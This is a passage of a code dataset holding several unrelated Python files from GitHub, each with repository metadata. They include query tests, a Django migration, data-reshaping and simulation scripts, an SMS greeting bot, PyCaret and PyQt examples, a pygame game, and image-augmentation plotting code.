len(records[1].msg.lstrip(' ')),\n 5)\n self.assertEqual(len(records[3].msg) - len(records[3].msg.lstrip(' ')),\n 1)\n\n def test_report_uncached_no_end_post(self):\n with LogCapture() as logged:\n cache = query.TimingAwareCache({})\n cache.start_post()\n cache.get('foo')\n cache.end_post()\n cache.get('foobar')\n cache['foo'] = 'bar'\n cache.report()\n records = logged.records\n\n self.assertTrue(records[2].msg.endswith(' ?: foobar.'))\n\n\nclass 
QueryTest(QueryTestBase):\n\n def test_injected_caching(self):\n class MockCaching:\n _cache = dict()\n _get = 0\n _set = 0\n\n def get(self, key):\n self._get += 1\n return self._cache.get(key)\n\n def __setitem__(self, key, value):\n self._set += 1\n self._cache[key] = value\n\n caching = MockCaching()\n self.searchResults(query.And(query.All(f1)), caching=caching)\n self.assertEqual(caching._get, 2)\n self.assertEqual(caching._set, 2)\n\n self.searchResults(query.And(query.All(f1)), caching=caching)\n self.assertEqual(caching._get, 3)\n self.assertEqual(caching._set, 2)\n self.assertEqual(\n sorted(caching._cache.keys()),\n [('all', 'catalog1', 'f1'), ('and', ('all', 'catalog1', 'f1'))])\n self.assertEqual(\n [v.keys() for v in caching._cache.values()],\n [[0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]])\n\n def test_timing(self):\n with LogCapture() as logged:\n self.searchResults(\n query.And(query.All(f1)), timing=.00000001)\n records = logged.records\n\n self.assertEqual(len(records), 3)\n self.assertIn(\"('and', ('all', 'catalog1', 'f1')\", records[1].msg)\n self.assertIn(\"('all', 'catalog1', 'f1')\", records[2].msg)\n\n def test_timing_cutoff(self):\n with LogCapture() as logged:\n self.searchResults(query.And(query.All(f1)), timing=5)\n records = logged.records\n\n self.assertEqual(len(records), 0)\n\n def test_timing_noresult(self):\n with LogCapture() as logged:\n results = self.displayQuery(\n query.And(query.Eq(f1, 'foo')), timing=.00000001)\n records = logged.records\n\n self.assertEqual(results, [])\n self.assertEqual(len(records), 3)\n\n\nclass TermsTest(QueryTestBase):\n\n def test_Term_apply(self):\n term = query.Term()\n with self.assertRaises(NotImplementedError):\n term.apply(None)\n\n def test_Term_dunder_rand(self):\n class AndDisabledAll(query.All):\n\n def __and__(self, other):\n return NotImplemented\n\n left = AndDisabledAll(f1)\n right = query.All(f1)\n\n self.assertEqual(self.displayQuery(\n left & right),\n [1, 2, 3, 4, 5, 6])\n\n def test_Term_dunder_ror(self):\n class OrDisabledAll(query.All):\n\n def __or__(self, other):\n return NotImplemented\n\n left = OrDisabledAll(f1)\n right = query.All(f1)\n\n self.assertEqual(self.displayQuery(\n left | right),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_one_result(self):\n self.assertEqual(self.displayQuery(\n query.And(query.All(f1))),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_empty_intersection(self):\n self.assertEqual(self.displayQuery(\n query.And(query.Eq(f1, 'a'), query.Eq(f1, 'X'))),\n [])\n\n def test_And_weighted(self):\n # this only executes the code path without any clue what the\n # impact of 'weighted' should be, if any\n self.assertEqual(self.displayQuery(\n query.And(query.All(f1), query.All(f1), weighted=True)),\n [1, 2, 3, 4, 5, 6])\n\n def test_And_weighted_empty_intersection(self):\n self.assertEqual(self.displayQuery(\n query.And(query.Eq(f1, 'a'), query.Eq(f1, 'X'), weighted=True)),\n [])\n\n def test_Or_one_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Or(query.Eq(f1, 'foo'))),\n [])\n\n def test_Or_one_result(self):\n self.assertEqual(self.displayQuery(\n query.Or(query.All(f1))),\n [1, 2, 3, 4, 5, 6])\n\n def test_Difference_one_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Difference(query.Eq(f1, 'foo'))),\n [])\n\n def test_Difference_second_empty_result(self):\n self.assertEqual(self.displayQuery(\n query.Difference(query.All(f1), query.Eq(f1, 'foo'))),\n [1, 2, 3, 4, 5, 6])\n\n def test_Difference_empty_difference(self):\n self.assertEqual(self.displayQuery(\n 
query.Difference(query.All(f1), query.All(f1))),\n [])\n\n def test_In_one_result(self):\n self.assertEqual(self.displayQuery(\n query.In(f1, ['Y', 'Z'])),\n [6])\n","repo_name":"zopefoundation/hurry.query","sub_path":"src/hurry/query/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":13996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30210845520","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils import timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('HuskyJamGuru', '0012_issuetypeupdate_author'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='issuetypeupdate',\n name='time',\n field=models.DateTimeField(default=timezone.now(), auto_now=True),\n preserve_default=False,\n ),\n ]\n","repo_name":"fedtf/guru","sub_path":"HuskyJamGuru/migrations/0013_issuetypeupdate_time.py","file_name":"0013_issuetypeupdate_time.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34329017692","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport sys\n\nif len(sys.argv) >1:\n samplefile = sys.argv[1]\nelse:\n print(\"enter file name\")\n\ndf = pd.read_excel(samplefile,skiprows=35)\nmean = df.iloc[0,1:]\nstdev = df.iloc[1,1:]\n\nmean_op = pd.DataFrame()\nstdev_op = pd.DataFrame()\n\nfor a in ['A','B','C','D','E','F','G','H']:\n d = mean.filter(regex=a)\n d.name = a\n d.index = np.arange(1,13,1)\n mean_op = mean_op.append(d)\n\nfor a in ['A','B','C','D','E','F','G','H']:\n d = stdev.filter(regex=a)\n d.name = a\n d.index = np.arange(1,13,1)\n stdev_op = stdev_op.append(d)\n\nmean_op.to_excel('OD.xlsx')\nstdev_op.to_excel('OD_stdev.xlsx')\n","repo_name":"furubayashim/reshape-OD-xls","sub_path":"reshape-OD-xls.py","file_name":"reshape-OD-xls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"165479697","text":"import time\nimport datetime\nimport shelve\nvx=6.4\nvy=5.6\n# y=0\n# x=0\n# RED=108\n# GREEN=42\nfinishx=470\nfinishy=410\n\ndb=shelve.open(\"periods of lights [r]\")\n\nfor red in range(31,131):\n RED=red\n GREEN=150-red\n db[str(red)]=0\n for first in range(0,150):\n for second in range(0,150):\n print(RED,GREEN,first,second)\n y=0\n x=0\n\n now_stay_green=max(0,GREEN-first)\n now_stay_red=min(RED,150-first)\n time_now=0\n while x<=finishx and y<=finishy:\n color=1\n # sec=max(0,GREEN-first)\n while now_stay_green>0 and x<=finishx and y<=finishy:\n # print(int(x),int(y),sec)\n x+=vx\n y+=vy\n time_now+=1\n now_stay_green-=1\n if x<finishx and y<finishy:\n color=0\n time_now+=now_stay_red\n now_stay_green=GREEN\n now_stay_red=RED\n\n # time_last=datetime.datetime.now()\n\n x=0\n y=0\n\n\n second_time=max(0,GREEN-second)\n now_stay_red=min(RED,150-second)\n now_stay_green=max(0,RED-second)\n while x<=finishx and y<=finishy:\n color=0\n # sec=max(0,GREEN-first)\n while now_stay_red>0 and x<=finishx and y<=finishy:\n # print(int(x),int(y),sec)\n x+=vx\n y+=vy\n time_now+=1\n now_stay_red-=1\n if x<finishx and y<finishy:\n color=0\n time_now+=now_stay_green\n now_stay_green=GREEN\n now_stay_red=RED\n result_time=max(time_now,second_time)\n # result_time=max(time_last-time_now,time_last_sure-time_last)\n db[str(RED)]=max(db[str(RED)],result_time)\n # 
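
The reshape-OD-xls script above turns a flat plate readout (wells labelled A1 through H12) into an 8x12 table by regex-filtering each row letter. A self-contained sketch of the same reshape on synthetic values, building the labels explicitly instead of via regex (which could misfire if a label ever contained a row letter elsewhere):

```python
import numpy as np
import pandas as pd

rows, cols = list("ABCDEFGH"), list(range(1, 13))

# Flat Series indexed "A1".."H12", standing in for the plate export
flat = pd.Series(np.random.rand(96),
                 index=[f"{r}{c}" for r in rows for c in cols])

# Rebuild the 8x12 plate layout: one row per letter, one column per number
plate = pd.DataFrame({c: [flat[f"{r}{c}"] for r in rows] for c in cols},
                     index=rows)
print(plate.shape)  # (8, 12)
```
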
print(time_last-time_now)\ndb.close()\n","repo_name":"Digitaljay/cloud_traffic_system","sub_path":"optimum.py","file_name":"optimum.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73140665153","text":"# coding=utf-8\nimport os\nfrom datetime import datetime, date\nimport requests\nimport yaml\nimport json\nimport random\n\nclass GFEverydaySMS:\n weather_types = {\"风\": 1, \"云\": 2, \"雨\": 3, \"雪\": 4, \"霜\": 5, \"露\": 6, \"雾\": 7, \"雷\": 8, \"晴\": 9, \"阴\": 10,\n \"feng\": 1, \"yun\": 2, \"yu\": 3, \"xue\": 4, \"shuang\": 5, \"lu\": 6, \"wu\": 7, \"lei\": 8, \"qing\": 9, \"yin\": 10}\n urls = {\"zaoan\": 'http://api.tianapi.com/txapi/zaoan/index?key={0}',\n \"tianqi\": 'http://api.tianapi.com/txapi/tianqi/index?key={0}&city={1}',\n \"wanan\": 'http://api.tianapi.com/txapi/wanan/index?key={0}',\n \"qinghua\": 'http://api.tianapi.com/txapi/saylove/index?key={0}',\n \"sms\": 'https://api.binstd.com/sms/send?appkey={0}&mobile={1}&content={2}'}\n # 注意:顺序影响短信编辑\n zaoan_apis = [\"zaoan\", \"tianqi\"]\n wanan_apis = [\"qinghua\", \"wanan\"]\n\n def __init__(self):\n self.sms_list, self.dictum_channels, self.text_emoji_file, self.tx_api_key, self.bin_std_api_key = self.get_init_data()\n\n def get_init_data(self):\n '''\n 初始化基础数据\n :return: None\n '''\n with open('_config.yaml', 'r', encoding='utf-8') as f:\n config = yaml.load(f, Loader=yaml.Loader)\n morning_alarm_timed = config.get('morning_alarm_timed').strip()\n evening_alarm_timed = config.get('evening_alarm_timed').strip()\n init_msg = f\"每天定时发送时间:早-{morning_alarm_timed}, 晚-{evening_alarm_timed}\\n\"\n\n morning_dictum_channel = config.get('morning_dictum_channel', '')\n evening_dictum_channel = config.get('evening_dictum_channel', '')\n dictum_channels = [morning_dictum_channel, evening_dictum_channel]\n init_msg += f\"信息获取渠道:早-{morning_dictum_channel}, 晚-{evening_dictum_channel}\\n\\n\"\n\n text_emoji_file = config.get('text_emoji_file', '')\n init_msg += f\"text_emoji文件名:{text_emoji_file}\\n\"\n\n\n sms_list = []\n sms_infos = config.get('sms_infos')\n for sms_info in sms_infos:\n sms = {}\n phone_number_file = sms_info.get('phone_number_file').strip()\n sms[\"phone_numbers\"] = []\n with open(phone_number_file, \"r\") as file:\n raw_phone_numbers = file.readlines()\n for raw_phone_number in raw_phone_numbers:\n phone_number = raw_phone_number.strip()\n if(len(phone_number) > 0):\n sms[\"phone_numbers\"].append(phone_number)\n sms[\"gf_name\"] = sms_info.get('gf_name', '')\n sms[\"city_name\"] = sms_info.get('city_name', '')\n sms[\"start_date\"] = sms_info.get('start_date', '')\n sms[\"sweet_words\"] = sms_info.get('sweet_words', '')\n\n sms_list.append(sms)\n print_msg = f\"女朋友的手机号码:{str(sms['phone_numbers'])}\\n\" \\\n f\"女友所在地区:{sms['city_name']}\\n\" \\\n f\"在一起的第一天日期:{sms['start_date']}\\n\" \\\n f\"最后一句为:{sms['sweet_words']}\\n\\n\"\n init_msg += print_msg\n\n tx_api_key = ''\n bin_std_api_key = []\n try:\n with open(config.get('tx_api_key_file', 'no_config'), \"r\") as file:\n tx_api_key = file.readline()\n with open(config.get('bin_std_api_key_file', 'no_config'), \"r\") as file:\n bin_std_app_key = file.readline().strip()\n bin_std_secret_key = file.readline().strip()\n bin_std_api_key = [bin_std_app_key, bin_std_secret_key]\n except:\n print(\"获取 API Key 失败,文件打开失败!请检查是否存在配置文件中的 api_key_file...\\n\")\n\n init_msg += f\"tx_api_key:{tx_api_key}\\nbin_std_api_key:{str(bin_std_api_key)}\\n\"\n\n print(u\"*\" * 25 + \"init msg\" 
+ u\"*\" * 25)\n print(init_msg)\n\n return sms_list, dictum_channels, text_emoji_file, tx_api_key, bin_std_api_key\n\n def start_today_info(self, chat_id, send_test=False):\n '''\n 每日定时开始处理。\n :param chat_id:int, 判断早晚安信息(0:早安,1:晚安)。\n :param send_test:bool, 测试标志,当为True时,不发送信息。\n :return: None。\n '''\n print(\"*\" * 20 + \"start_today_info\" + \"*\" * 20)\n print(\"chat_id:\", chat_id, \"send_test:\", send_test)\n print(\"获取相关信息...\")\n date_str = date.today().strftime('%Y-%m-%d')\n for sms in self.sms_list:\n days = (datetime.strptime(date_str, '%Y-%m-%d') - datetime.strptime(sms[\"start_date\"], '%Y-%m-%d')).days\n # 判断早安还是晚安\n if chat_id == 0:\n sms_msg = f\"{sms['gf_name']},今天是我们相恋的第{days}天!想你~\\n\"\n apis = self.zaoan_apis\n elif(chat_id == 1):\n sms_msg = f\"{sms['gf_name']},我们相恋的第{days}天就要结束啦!爱你~\\n\"\n apis = self.wanan_apis\n else:\n print(\"Wrong chat id!!!\")\n return\n # 构建短信\n for k in apis:\n if k == \"tianqi\":\n url = self.urls[k].format(self.tx_api_key, sms[\"city_name\"])\n else:\n url = self.urls[k].format(self.tx_api_key)\n sms_msg += self.get_url_info(url, k, \"./cache/\" + k + \"/\" + date_str + \".txt\")\n sms_msg += sms['sweet_words']\n sms_msg += self.get_text_emoji()\n # 发送短信\n if len(sms[\"phone_numbers\"]) <= 0:\n print(\"No Phone Number with msg:\", sms_msg)\n return\n else:\n phone_numbers = sms[\"phone_numbers\"][0]\n for phone_number in sms[\"phone_numbers\"][1:]:\n phone_numbers += \",\" + phone_number\n if not send_test:\n url = self.urls[\"sms\"].format(self.bin_std_api_key[0], phone_numbers, sms_msg)\n self.send_sms_with_url(url)\n print(f\"发送给{phone_numbers}成功:\\n\", sms_msg)\n return\n\n def get_url_info(self, url, k, file_path=\"\"):\n '''\n 获取url的返回值\n :param url: 请求地址\n :param k: 请求类型\n :param file_name: 缓存文件名\n :return: url返回值\n '''\n print(\"*\" * 10 + \"getting url info\" + \"*\" * 10)\n if(os.path.exists(file_path)):\n print(\"reading cache file: \", file_path)\n with open(file_path, \"r\") as file:\n content = json.load(file)\n else:\n print(\"request url: \", url)\n resp = requests.get(url)\n content = json.loads(resp.text)\n if content:\n print(content)\n with open(file_path, \"w\") as file:\n file.write(json.dumps(content))\n\n c = content['newslist'][0]\n if k == \"tianqi\":\n msg = f\"***天气预报来袭~~~\\n\" \\\n f\"***{c['date']} {c['week']}\\n\" \\\n f\"***今日{c['weather']}\\n\" \\\n f\"***气温{c['lowest']}/{c['highest']},当前气温{c['real']}\\n\" \\\n f\"***风力{c['windspeed']}\\n\" \\\n f\"***空气质量 {c['air_level']}\\n\"\n elif k == \"zaoan\":\n if \"早安\" in c[\"content\"]:\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = \"早安~\\n\" + c[\"content\"] + \"\\n\"\n elif k == \"wanan\":\n if \"晚安\" in c[\"content\"]:\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = c[\"content\"] + \"\\n晚安~\\n\"\n elif k == \"qinghua\":\n msg = c[\"content\"] + \"\\n\"\n else:\n msg = c[\"content\"] + \"\\n\"\n return msg\n\n def get_text_emoji(self):\n '''\n 随机获取一个 text emoji 作为结束标记\n :return: str text_emoji\n '''\n text_emoji = []\n with open(self.text_emoji_file, \"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\n for line in lines:\n if len(line) > 0:\n text_emoji.append(line)\n return random.choice(text_emoji)\n \n def send_sms_with_url(self, url):\n print(\"*\" * 10 + \"sending sms\" + \"*\" * 10)\n resp = requests.get(url)\n content = json.loads(resp.text)\n if content:\n print(content)\n\nif __name__ == '__main__':\n g = GFEverydaySMS()\n g.start_today_info(0, send_test=True)\n g.start_today_info(1, 
send_test=True)","repo_name":"Chaunhewie/EveryDaySMSGreet","sub_path":"GFEverydaySMS.py","file_name":"GFEverydaySMS.py","file_ext":"py","file_size_in_byte":8643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30020686663","text":"# %% \r\nfrom pycaret.datasets import get_data\r\ndataset = get_data('credit', profile=True)\r\n\r\n# %%\r\ndata = dataset.sample(frac=0.95, random_state=786).reset_index(drop=True)\r\ndata_unseen = dataset.drop(data.index).reset_index(drop=True)\r\n\r\nprint('Data for Modeling: ' + str(data.shape))\r\nprint('Unseen Data For Predictions ' + str(data_unseen.shape))\r\n\r\n# %%\r\nfrom pycaret.classification import *\r\n\r\n# %%\r\nexp_clf102 = setup(data = data, target = 'default', session_id=123,\r\n normalize = True, \r\n transformation = True, \r\n ignore_low_variance = True,\r\n remove_multicollinearity = True, multicollinearity_threshold = 0.95,\r\n bin_numeric_features = ['LIMIT_BAL', 'AGE'],\r\n group_features = [['BILL_AMT1', 'BILL_AMT2','BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6'],\r\n ['PAY_AMT1','PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6']])\r\n\r\n# %%\r\ncompare_models()\r\n# %%\r\ntuned_rf = tune_model('rf')\r\ntuned_rf2 = tune_model('rf', optimize = 'AUC')\r\n\r\n# %%\r\n# lets create a simple decision tree model that we will use for ensembling \r\ndt = create_model('dt')\r\n\r\n# %%\r\nbagged_dt = ensemble_model(dt)\r\n\r\n# %%\r\nboosted_dt = ensemble_model(dt, method = 'Boosting')\r\n\r\n# %%\r\ntuned_bagged_dt = tune_model('dt', ensemble=True, method='Bagging')\r\n\r\n# %%\r\n","repo_name":"anarinsk/tor-pycaret","sub_path":"clf-102.py","file_name":"clf-102.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6225014042","text":"from PyQt5.Qt import *\nimport sys\n\nclass Window(QWidget):\n\n def __init__(self):\n super(Window, self).__init__()\n self.QObject()\n\n def QObject(self):\n\n lable1 = QLabel(self)\n lable1.move(100,100)\n lable1.setText('第一关文本控件')\n lable2 = QLabel(self)\n lable2.move(200, 200)\n lable2.setText('第二个文本控件')\n bin = QPushButton(self)\n bin.move(300,300)\n bin.setText(\"点我\")\n\n for i in self.findChildren(QLabel):\n print(i)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/类型判定/通过findchildern找到窗口下的子控件.py","file_name":"通过findchildern找到窗口下的子控件.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18630489605","text":"import sys\n\nN = int(input())\n\nChecklist = [0] * 10001\n\nfor i in range(N):\n x = int(sys.stdin.readline())\n Checklist[x] = Checklist[x] + 1\n\nfor i in range(10001):\n if Checklist[i] != 0:\n for j in range(Checklist[i]):\n print(i)","repo_name":"junyeong-youn/Jungle_feat.JY","sub_path":"Algorithm/WEEK01/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26911735309","text":"import pygame as pg\nimport random\nimport sys\nimport tkinter.messagebox as tkm\nimport tkinter as tk\nimport time\n\n\n\n\n\nclass Screen:\n def __init__(self, title, wh, img_path):\n pg.display.set_caption(title) \n self.sfc = pg.display.set_mode(wh)\n self.rct = self.sfc.get_rect()\n self.bgi_sfc = 
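
The `get_url_info` helper in the GFEverydaySMS record above caches each API response to a per-day file so repeated runs skip the network. That fetch-or-reuse pattern in isolation; the URL and cache path in the usage line are placeholders, and `requests` is assumed to be installed:

```python
import json
import os

import requests

def cached_get(url, cache_path):
    if os.path.exists(cache_path):
        with open(cache_path) as f:
            return json.load(f)          # cache hit: skip the network
    content = requests.get(url).json()   # cache miss: fetch...
    with open(cache_path, "w") as f:
        json.dump(content, f)            # ...and persist for next time
    return content

# e.g. cached_get("https://example.com/api", "/tmp/resp.json")
```
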
pg.image.load(img_path)\n self.bgi_rct = self.bgi_sfc.get_rect() \n\n def blit(self):\n self.sfc.blit(self.bgi_sfc, self.bgi_rct) \n\n\nclass Bird:\n key_delta = {\n pg.K_UP: [0, -1],\n pg.K_DOWN: [0, +1],\n pg.K_LEFT: [-1, 0],\n pg.K_RIGHT: [+1, 0],\n }\n\n def __init__(self, img_path, ratio, xy):\n self.sfc = pg.image.load(img_path)\n self.sfc = pg.transform.rotozoom(self.sfc, 0, ratio)\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n key_dct = pg.key.get_pressed()\n for key, delta in Bird.key_delta.items():\n if key_dct[key]:\n self.rct.centerx += delta[0]\n self.rct.centery += delta[1] \n if check_bound(self.rct, scr.rct) != (+1, +1):\n self.rct.centerx -= delta[0]\n self.rct.centery -= delta[1]\n self.blit(scr) \n #def gunpos(self): 実装できなった\n #pos = self.facing * self.gun_offset + self.rect.centerx\n #return pos, self.rect.top \n\n\nclass Bomb:\n def __init__(self, color, rad, vxy, scr:Screen):\n self.sfc = pg.Surface((2*rad, 2*rad)) # 正方形の空のSurface\n self.sfc.set_colorkey((0, 0, 0))\n pg.draw.circle(self.sfc, color, (rad, rad), rad)\n self.rct = self.sfc.get_rect()\n self.rct.centerx = random.randint(0, scr.rct.width)\n self.rct.centery = random.randint(0, scr.rct.height)\n self.vx, self.vy = vxy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate\n self.blit(scr)\n\nclass Enemy:\n def __init__(self, img_path1, ratio, xy,vxy, scr:Screen):\n self.sfc = pg.image.load(img_path1)\n self.sfc = pg.transform.rotozoom(self.sfc, 0, ratio)\n self.rct = self.sfc.get_rect()\n self.rct.center = xy\n self.vx, self.vy = vxy\n\n def blit(self, scr:Screen):\n scr.sfc.blit(self.sfc, self.rct)\n\n def update(self, scr:Screen):\n self.rct.move_ip(self.vx, self.vy)\n yoko, tate = check_bound(self.rct, scr.rct)\n self.vx *= yoko\n self.vy *= tate\n self.blit(scr)\n#class Shot(pg.sprite.Sprite):\n #攻撃する\n\n #speed = -11\n #images = []\n\n #def __init__(self, pos):\n #pg.sprite.Sprite.__init__(self, self.containers)\n #self.image = self.images[0]\n #self.rect = self.image.get_rect(midbottom=pos)\n\n #def update(self):\n \n #self.rect.move_ip(0, self.speed)\n #if self.rect.top <= 0:\n #self.kill()\n\n \n\n\ndef check_bound(obj_rct, scr_rct):\n \"\"\"\n 第1引数:こうかとんrectまたは爆弾rect\n 第2引数:スクリーンrect\n 範囲内:+1/範囲外:-1\n \"\"\"\n yoko, tate = +1, +1\n if obj_rct.left < scr_rct.left or scr_rct.right < obj_rct.right:\n yoko = -1\n if obj_rct.top < scr_rct.top or scr_rct.bottom < obj_rct.bottom:\n tate = -1\n return yoko, tate\n\n\ndef main():\n clock =pg.time.Clock()\n\n # 練習1\n scr = Screen(\"逃げろ!こうかとん\", (1600,900), \"fig/pg_bg.jpg\")\n\n # 練習3\n kkt = Bird(\"fig/6.png\", 2.0, (900,400))\n kkt.update(scr)\n\n vx = random.choice([-1,+1])\n vy = random.choice([-1,+1])\n emy = Enemy(\"fig/alien1.png\", 2.0, (300,200),(vx,vy),scr)\n emy.update(scr)\n\n # 練習5\n bkd_lst = [] #爆弾を5個生成\n bombs = []\n colors = [\"red\",\"green\",\"blue\",\"yellow\",\"magenta\"]\n for i in range(5):\n color = colors[i]\n vx = random.choice([-1,+1])\n vy = random.choice([-1,+1])\n bombs.append(Bomb(color,10,(vx,vy),scr))\n \n #bkd = Bomb((255, 0, 0), 10, (+1, +1), scr)\n #bkd.update(scr)\n \n # 練習2\n while True: \n scr.blit()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n return\n \n kkt.update(scr)\n for bomb in bombs:\n #爆弾を5個生成\n bomb.update(scr)\n if 
kkt.rct.colliderect(bomb.rct):\n root = tk.Tk()\n root.withdraw()\n tkm.showinfo(\"ドンマイ\",\"Game Over\")#コメントを表示\n return\n if kkt.rct.colliderect(emy.rct):\n root = tk.Tk()\n root.withdraw()\n tkm.showinfo(\"ドンマイ\",\"Game Over\")#コメントを表示\n return\n\n pg.display.update()\n clock.tick(1000)\n\n\nif __name__ == \"__main__\":\n pg.init()\n main()\n pg.quit()\n sys.exit()\n","repo_name":"yuki21168/ProjExD","sub_path":"ex05/fight_kokaton.py","file_name":"fight_kokaton.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9470934758","text":"from bs4 import BeautifulSoup as bs\nimport os\n\n# return baseurl\n# e.g., '/' if local, '~yixuezhao' if on my server\ndef get_baseurl_from_config():\n config_file = 'config/_default/config.toml'\n with open(config_file) as file:\n for line in file:\n if 'baseurl' in line and not '#' in line:\n baseurl = line.split('\\\"')[1]\n return baseurl.replace('/', '')\n\n# filepath: public/mentoring/index.html\n# baseurl: ~yixuezhao\n# path_to_update: 'js/load-photoswipe.js'\ndef add_baseurl_to_html(filepath, baseurl):\n # Open the HTML in which you want to make changes\n html = open(filepath)\n # Parse HTML file in Beautiful Soup\n soup = bs(html, 'html.parser')\n\n # update '/js/load-photoswipe.js'\n old_text = soup.find('script', {'src': '/js/load-photoswipe.js'})\n if old_text is None:\n raise ValueError('/js/load-photoswipe.js', 'not found, please check file:', filepath)\n new_text = '/' + os.path.join(baseurl, 'js/load-photoswipe.js')\n # replace old text with new text\n old_text['src'] = new_text\n\n # update '/css/hugo-easy-gallery.css'\n old_text = soup.find('link', {'href': '/css/hugo-easy-gallery.css'})\n if old_text is None:\n raise ValueError('/css/hugo-easy-gallery.css', 'not found, please check file:', filepath)\n new_text = '/' + os.path.join(baseurl, 'css/hugo-easy-gallery.css')\n # replace old text with new text\n old_text['href'] = new_text\n\n # Alter HTML file to see the changes done\n with open(filepath, 'wb') as f_output:\n f_output.write(soup.prettify(\"utf-8\"))\n \n print('Done! 
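
In the pygame record above, `check_bound` returns -1 on whichever axis left the screen, and `Bomb.update` multiplies the velocity by that sign to bounce. The same mechanism with plain numbers instead of pygame rects, so it runs without a display:

```python
# -1 on an axis that crossed the screen edge, +1 otherwise; multiplying
# the velocity by the result flips direction on that axis only.
def check_bound(left, right, top, bottom, scr_w, scr_h):
    yoko = -1 if left < 0 or right > scr_w else +1
    tate = -1 if top < 0 or bottom > scr_h else +1
    return yoko, tate

vx, vy = 5, -3
yoko, tate = check_bound(-2, 18, 40, 60, 800, 600)  # left edge crossed
vx *= yoko
vy *= tate
print(vx, vy)  # -5 -3  (horizontal velocity flipped, vertical unchanged)
```
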
:) replaced file', filepath)\n \n\n\n\nif __name__ == '__main__':\n baseurl = get_baseurl_from_config()\n print('baseurl is:', baseurl)\n add_baseurl_to_html('public/mentoring/index.html', baseurl)\n add_baseurl_to_html('public/misc/index.html', baseurl)\n\n ","repo_name":"felicitia/HugoAcademicWebsite","sub_path":"yixue_script.py","file_name":"yixue_script.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2602224264","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport sys\nimport yaml\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport dataset\n\ndef plot_image_grid(images, ncols=None, cmap='gray'):\n '''Plot a grid of images'''\n if not ncols:\n factors = [i for i in range(1, len(images)+1) if len(images) % i == 0]\n ncols = factors[len(factors) // 2] if len(factors) else len(images) // 4 + 1\n nrows = int(len(images) / ncols) + int(len(images) % ncols)\n imgs = [images[i] if len(images) > i else None for i in range(nrows * ncols)]\n f, axes = plt.subplots(nrows, ncols, figsize=(3*ncols, 2*nrows))\n axes = axes.flatten()[:len(imgs)]\n for img, ax in zip(imgs, axes.flatten()): \n if np.any(img):\n if len(img.shape) > 2 and img.shape[2] == 1:\n img = img.squeeze()\n ax.axis('off')\n ax.imshow(img, cmap=cmap)\n plt.show()\n#base_path = '/home/maanvi/LAB/Datasets'\nbase_path = r'D:\\01_Maanvi\\LABB\\datasets'\nphase = 'dc'\n#path = os.path.join(base_path,'kt_new_trainvaltest',phase,'5CV/allSubjectPaths0.yaml')\npath = os.path.join(base_path,'kt_new_trainvaltest','fold1',phase,'allSubjectPaths1.yaml')\nwith open(path, 'r') as file:\n data = yaml.safe_load(file)\n subject_path = data['train'][10]\n\nprint(subject_path)\n\nimg_file = os.path.join(subject_path,phase,'1.png')\nimg = cv2.imread(img_file)\n#plt.imshow(img)\n#plt.show()\nlabel = 0\noutput_size = (224,224)\naug_functions = [\n dataset.flip_leftright,\n # dataset.rotate90,\n # dataset.rotate180,\n # dataset.rotate270,\n # dataset.up_rotate90,\n # dataset.up_rotate180,\n # dataset.up_rotate270,\n # dataset.random_horizontalflip,\n # dataset.random_verticalflip,\n # dataset.random_rotation,\n # dataset.random_brightness,\n]\n\nimages = []\nadd = True\nfor aug in aug_functions:\n image = dataset.parse_subject(subject_path, output_size, [phase], tumor_region_only=True)[phase]['1']\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n if add:\n images.append(image)\n add = False\n image = 